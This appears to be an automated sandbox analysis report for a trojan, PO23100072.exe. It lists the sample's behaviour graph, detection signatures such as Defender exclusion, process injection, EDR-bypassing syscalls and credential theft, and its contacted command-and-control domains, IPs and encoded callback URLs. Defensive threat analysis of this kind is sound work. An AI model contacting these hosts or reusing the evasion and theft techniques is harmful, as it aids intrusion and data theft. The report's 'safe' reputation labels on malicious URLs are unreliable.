            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517921 Sample: PO23100072.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 39 www.suarahati20.xyz 2->39 41 yu35n.top 2->41 43 24 other IPs or domains 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 61 7 other signatures 2->61 10 PO23100072.exe 4 2->10         started        signatures3 59 Performs DNS queries to domains with low reputation 39->59 process4 file5 37 C:\Users\user\AppData\...\PO23100072.exe.log, ASCII 10->37 dropped 65 Adds a directory exclusion to Windows Defender 10->65 14 PO23100072.exe 10->14         started        17 powershell.exe 23 10->17         started        19 PO23100072.exe 10->19         started        signatures6 process7 signatures8 75 Maps a DLL or memory area into another process 14->75 21 FrMKpuEiehQ.exe 14->21 injected 77 Loading BitLocker PowerShell Module 17->77 24 WmiPrvSE.exe 17->24         started        26 conhost.exe 17->26         started        process9 signatures10 63 Found direct / indirect Syscall (likely to bypass EDR) 21->63 28 userinit.exe 13 21->28         started        process11 signatures12 67 Tries to steal Mail credentials (via file / registry access) 28->67 69 Tries to harvest and steal browser information (history, passwords, etc) 28->69 71 Modifies the context of a thread in another process (thread injection) 28->71 73 3 other signatures 28->73 31 FrMKpuEiehQ.exe 28->31 injected 35 firefox.exe 28->35         started        process13 dnsIp14 45 agilizeimob.app 84.32.84.32, 49764, 49765, 49766 NTT-LT-ASLT Lithuania 31->45 47 www.pofgof.pro 209.74.95.29, 49732, 49733, 49734 MULTIBAND-NEWHOPEUS United States 31->47 49 9 other IPs or domains 31->49 51 Found direct / indirect Syscall (likely to bypass EDR) 31->51 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PO23100072.exe53%ReversingLabsWin32.Trojan.Generic
            PO23100072.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.airtech365.net/i5ct/0%Avira URL Cloudsafe
            http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
            http://www.suarahati20.xyz/tuad/?Ux_TPFo=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&FvypB=88kTDXb8k4dH0%Avira URL Cloudsafe
            http://www.yu35n.top/wqu9/0%Avira URL Cloudsafe
            http://www.donante-de-ovulos.biz/8lrv/?Ux_TPFo=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&FvypB=88kTDXb8k4dH0%Avira URL Cloudsafe
            https://htmlcodex.com0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css0%Avira URL Cloudsafe
            http://www.dhkatp.vip/u85y/?FvypB=88kTDXb8k4dH&Ux_TPFo=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA==0%Avira URL Cloudsafe
            http://www.airtech365.net/i5ct/?FvypB=88kTDXb8k4dH&Ux_TPFo=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==0%Avira URL Cloudsafe
            http://www.eslameldaramlly.site/30vc/0%Avira URL Cloudsafe
            http://www.longfilsalphonse.net/8q1d/?FvypB=88kTDXb8k4dH&Ux_TPFo=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==0%Avira URL Cloudsafe
            http://www.eslameldaramlly.site/30vc/?Ux_TPFo=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&FvypB=88kTDXb8k4dH0%Avira URL Cloudsafe
            https://code.jquery.com/jquery-3.4.1.min.js0%Avira URL Cloudsafe
            http://www.komart.shop/ypa3/0%Avira URL Cloudsafe
            http://156.226.108.98:58888/0%Avira URL Cloudsafe
            http://www.agilizeimob.app0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/bootstrap-icons0%Avira URL Cloudsafe
            http://www.timetime.store/hvm1/?FvypB=88kTDXb8k4dH&Ux_TPFo=AgKb8DW05IXx47rDIxe6k/I3elmL24Z8KJzJt46ewrw8hV7koCZq3nWDxRNTdr9dPMkLNwozkBBgf0Q4+Yfq/718ZCTBXcvSkJlRrZQnUmqO5QjtzKFYlQ011ieRBpIGng==0%Avira URL Cloudsafe
            http://www.52ywq.vip/ujoo/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.longfilsalphonse.net/8q1d/0%Avira URL Cloudsafe
            http://www.agilizeimob.app/we8s/?Ux_TPFo=B/Ffkm4qUuUCWdnVEpVwdmrdDijaPZ3A0fpocgttxQoV3YOc442YbZNzMMcWNYt4UT21tvDjHwm/MpeUUta83tC+u6YvkHEIW8iJ6mTYaCCmbzx0dOXTePBC5wD5mbl0jA==&FvypB=88kTDXb8k4dH0%Avira URL Cloudsafe
            http://www.pofgof.pro/gfz9/?FvypB=88kTDXb8k4dH&Ux_TPFo=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw==0%Avira URL Cloudsafe
            https://t.me/AG099990%Avira URL Cloudsafe
            http://www.cc101.pro/ttiz/?Ux_TPFo=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&FvypB=88kTDXb8k4dH0%Avira URL Cloudsafe
            https://6329.vhjhbv.com/ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC0%Avira URL Cloudsafe
            http://www.agilizeimob.app/we8s/0%Avira URL Cloudsafe
            http://www.popin.space/x7gz/0%Avira URL Cloudsafe
            http://www.suarahati20.xyz/tuad/0%Avira URL Cloudsafe
            http://www.dhkatp.vip/u85y/0%Avira URL Cloudsafe
            http://www.pofgof.pro/gfz9/0%Avira URL Cloudsafe
            http://www.timetime.store/hvm1/0%Avira URL Cloudsafe
            http://www.yu35n.top/wqu9/?Ux_TPFo=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&FvypB=88kTDXb8k4dH0%Avira URL Cloudsafe
            http://www.popin.space/x7gz/?FvypB=88kTDXb8k4dH&Ux_TPFo=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA==0%Avira URL Cloudsafe
            https://htmlcodex.com/credit-removal0%Avira URL Cloudsafe
            http://www.donante-de-ovulos.biz/8lrv/0%Avira URL Cloudsafe
            http://www.cc101.pro/ttiz/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            eslameldaramlly.site
            		148.251.114.233
            		truetrue
              		unknown
              yu35n.top
              		38.47.232.144
              		truetrue
                		unknown
                dhkatp.vip
                		3.33.130.190
                		truetrue
                  		unknown
                  xzwp.g.zxy-cname.com
                  		52.230.28.86
                  		truetrue
                    		unknown
                    komart.shop
                    		133.130.35.90
                    		truetrue
                      		unknown
                      www.timetime.store
                      		52.223.13.41
                      		truetrue
                        		unknown
                        www.cc101.pro
                        		188.114.96.3
                        		truetrue
                          		unknown
                          airtech365.net
                          		3.33.130.190
                          		truetrue
                            		unknown
                            www.longfilsalphonse.net
                            		52.223.13.41
                            		truetrue
                              		unknown
                              94950.bodis.com
                              		199.59.243.227
                              		truetrue
                                		unknown
                                agilizeimob.app
                                		84.32.84.32
                                		truetrue
                                  		unknown
                                  www.donante-de-ovulos.biz
                                  		199.59.243.227
                                  		truetrue
                                    		unknown
                                    suarahati20.xyz
                                    		198.252.106.191
                                    		truetrue
                                      		unknown
                                      www.pofgof.pro
                                      		209.74.95.29
                                      		truetrue
                                        		unknown
                                        www.suarahati20.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.popin.space
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.dhkatp.vip
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.airtech365.net
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.agilizeimob.app
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.yu35n.top
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.komart.shop
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.bonusgame2024.online
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.52ywq.vip
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.asstl.online
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.eslameldaramlly.site
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.airtech365.net/i5ct/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.airtech365.net/i5ct/?FvypB=88kTDXb8k4dH&Ux_TPFo=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.donante-de-ovulos.biz/8lrv/?Ux_TPFo=j2pAwvMmmCrYZVhkds5ZvCZgOyouEeoq6hu2s2TUPhbYOoXX99buM+wwxSBgfXcmzEpqTCVAFMCZQnQtCVeL0dRVYSRjVdr/CgjqnWXTEiabUyUwGfk/MavwiZ9OFp3FkQ==&FvypB=88kTDXb8k4dHtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.suarahati20.xyz/tuad/?Ux_TPFo=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&FvypB=88kTDXb8k4dHtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.dhkatp.vip/u85y/?FvypB=88kTDXb8k4dH&Ux_TPFo=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.yu35n.top/wqu9/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.longfilsalphonse.net/8q1d/?FvypB=88kTDXb8k4dH&Ux_TPFo=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.eslameldaramlly.site/30vc/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.eslameldaramlly.site/30vc/?Ux_TPFo=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&FvypB=88kTDXb8k4dHtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.komart.shop/ypa3/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cc101.pro/ttiz/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.timetime.store/hvm1/?FvypB=88kTDXb8k4dH&Ux_TPFo=AgKb8DW05IXx47rDIxe6k/I3elmL24Z8KJzJt46ewrw8hV7koCZq3nWDxRNTdr9dPMkLNwozkBBgf0Q4+Yfq/718ZCTBXcvSkJlRrZQnUmqO5QjtzKFYlQ011ieRBpIGng==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.52ywq.vip/ujoo/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.longfilsalphonse.net/8q1d/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.agilizeimob.app/we8s/?Ux_TPFo=B/Ffkm4qUuUCWdnVEpVwdmrdDijaPZ3A0fpocgttxQoV3YOc442YbZNzMMcWNYt4UT21tvDjHwm/MpeUUta83tC+u6YvkHEIW8iJ6mTYaCCmbzx0dOXTePBC5wD5mbl0jA==&FvypB=88kTDXb8k4dHtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.cc101.pro/ttiz/?Ux_TPFo=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&FvypB=88kTDXb8k4dHtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.pofgof.pro/gfz9/?FvypB=88kTDXb8k4dH&Ux_TPFo=DECFPtkNR+L/pYonsxrHc+WCM/VSeiNdGHXC1uiZlfELiNg401X1ACIRXYvsaPq78G/yZTFuD+bUVczsz0zGAWWWu1tjgA/c8IlwGYN4NejsTIqQyiKVQyEjdjnk1Av5Dw==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.agilizeimob.app/we8s/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.popin.space/x7gz/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.suarahati20.xyz/tuad/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.dhkatp.vip/u85y/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.timetime.store/hvm1/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.donante-de-ovulos.biz/8lrv/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.pofgof.pro/gfz9/true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.yu35n.top/wqu9/?Ux_TPFo=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&FvypB=88kTDXb8k4dHtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.popin.space/x7gz/?FvypB=88kTDXb8k4dH&Ux_TPFo=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA==true
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://htmlcodex.comuserinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/chrome_newtabuserinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://cdn.jsdelivr.net/npm/bootstrapuserinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.cssuserinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.litespeedtech.com/error-pageuserinit.exe, 00000009.00000002.3907399818.000000000498E000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003C2E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.agilizeimob.appFrMKpuEiehQ.exe, 0000000A.00000002.3909668348.00000000054F5000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://code.jquery.com/jquery-3.4.1.min.jsuserinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.ecosia.org/newtab/userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://156.226.108.98:58888/userinit.exe, 00000009.00000002.3907399818.0000000004346000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.00000000035E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2014187374.0000000020AD6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.jsdelivr.net/npm/bootstrap-iconsuserinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ac.ecosia.org/autocomplete?q=userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.google.comuserinit.exe, 00000009.00000002.3907399818.0000000004CB2000.00000004.10000000.00040000.00000000.sdmp, userinit.exe, 00000009.00000002.3907399818.00000000044D8000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003778000.00000004.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003F52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://6329.vhjhbv.com/ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yCuserinit.exe, 00000009.00000002.3907399818.000000000548C000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.000000000472C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchuserinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://t.me/AG09999userinit.exe, 00000009.00000002.3907399818.0000000004346000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.00000000035E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2014187374.0000000020AD6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO23100072.exe, 00000000.00000002.1480577595.0000000002B55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://htmlcodex.com/credit-removaluserinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              209.74.95.29
                                                              		www.pofgof.proUnited States
                                                              		31744MULTIBAND-NEWHOPEUStrue
                                                              52.230.28.86
                                                              		xzwp.g.zxy-cname.comUnited States
                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                              133.130.35.90
                                                              		komart.shopJapan7506INTERQGMOInternetIncJPtrue
                                                              188.114.96.3
                                                              		www.cc101.proEuropean Union
                                                              		13335CLOUDFLARENETUStrue
                                                              198.252.106.191
                                                              		suarahati20.xyzCanada
                                                              		20068HAWKHOSTCAtrue
                                                              199.59.243.227
                                                              		94950.bodis.comUnited States
                                                              		395082BODIS-NJUStrue
                                                              52.223.13.41
                                                              		www.timetime.storeUnited States
                                                              		8987AMAZONEXPANSIONGBtrue
                                                              84.32.84.32
                                                              		agilizeimob.appLithuania
                                                              		33922NTT-LT-ASLTtrue
                                                              38.47.232.144
                                                              		yu35n.topUnited States
                                                              		174COGENT-174UStrue
                                                              3.33.130.190
                                                              		dhkatp.vipUnited States
                                                              		8987AMAZONEXPANSIONGBtrue
                                                              148.251.114.233
                                                              		eslameldaramlly.siteGermany
                                                              		24940HETZNER-ASDEtrue

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1517921
                                                              Start date and time:2024-09-25 09:14:19 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 11m 20s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:14
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:2
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:PO23100072.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@13/7@18/11
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 90%
                                                              • Number of executed functions: 76
                                                              • Number of non-executed functions: 273
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: PO23100072.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              03:15:17API Interceptor1x Sleep call for process: PO23100072.exe modified
                                                              03:15:20API Interceptor13x Sleep call for process: powershell.exe modified
                                                              03:16:15API Interceptor10987739x Sleep call for process: userinit.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              209.74.95.29PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                              • www.pofgof.pro/gfz9/
                                                              List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • www.onetoph.xyz/h5ax/
                                                              PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                              • www.sterkus.xyz/ha8h/
                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                              • www.pofgof.pro/gfz9/
                                                              52.230.28.86Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                              • www.52ywq.vip/4i87/
                                                              133.130.35.90Enquiry.exeGet hashmaliciousFormBookBrowse
                                                              • www.komart.shop/p9u3/
                                                              RFQ.exeGet hashmaliciousFormBookBrowse
                                                              • www.choco-nuts.shop/neoe/?uRn3VX5b=DnlbiccC5l56HKGwbLKxCNO5OmQ07IjbjVf7QFMdyqKMWNBt2gx6Np/F4BARKu2KuyOmOTmyYbkZ8LhWW3bSTEghtx7MXSqc4Q==&DFU=G2vCfCR24Z7As0ZY
                                                              Request for Quotation.exeGet hashmaliciousUnknownBrowse
                                                              • www.choco-nuts.shop/q8sm/?qHndnlFx=LduxcO7+HL9ZGc1cWv54pac5WGjlcDpv30jRXrg2nRjGh091IvZxrVpYbdZp4wHzaw9i6vON16Pzhm7gsSO3syoB+KYx3dZfJw==&z6Dxe=e0DxdT
                                                              Sipari#U015f Sorgulama #11032019,pdf.exeGet hashmaliciousFormBookBrowse
                                                              • www.lyd-styles.com/bqt2/?vThx0=dlgvRcGnEiA8NtlbjwgsZt6V3GdcIutvmCpv/FXoq9/jVu8AmDwlISFACbr4KhyYvOh7&OxoLsN=9rcDKRg8ujmx3V
                                                              188.114.96.3RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                              • www.1win-moldovia.fun/1g7m/
                                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
